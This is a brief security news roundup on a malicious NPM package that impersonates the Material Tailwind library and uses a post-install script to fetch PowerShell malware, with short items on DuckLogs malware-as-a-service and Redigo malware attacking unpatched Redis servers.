ReversingLabs researchers discovered that legitimate CSS-based software library Material Tailwind has been impersonated by a malicious NPM package, indicating continued malware distribution efforts in open source software repositories, The Hacker News reports.
The report noted that there have been 320 downloads of the malicious NPM package since Sept. 15.
"The malicious Material Tailwind npm package, while posing as a helpful development tool, has an automatic post-install script," said ReversingLabs researcher Karlo Zanki.
Included in the package was a script enabling the download of a ZIP archive file retrieved from a remote server, which features Powershell code snippets tasked to conduct communication, command-and-control, process manipulation, and persistence.
Such impersonation signifies the growing attack surface of the software supply chain, with the U.S. government recently directing the use of software development standard-compliant software.
"Ensuring software integrity is key to protecting Federal systems from threats and vulnerabilities and reducing overall risk from cyberattacks," said the White House.
This week, Dr. Doug raves about: 'The Orgy of the Walking Dead' or Elon is controlling my brain, Schoolyard Bully, Redigo, DuckLogs, Dod Alphabet soup, Sirius XM, Pixel Tracking, TSA, Single Sign-on rants, and more on the Security Weekly News!
Novel DuckLogs malware-as-a-service detailed More than 6,000 victims have been compromised by the new DuckLogs malware-as-a-service operation, whose platform is being leveraged by over 2,000 cybercriminals, according to BleepingComputer.
BleepingComputer reports that Redis servers that remain unpatched to CVE-2022-0543 are being compromised with the novel Go-based Redigo malware, which is not yet detected on VirusTotal antivirus engines.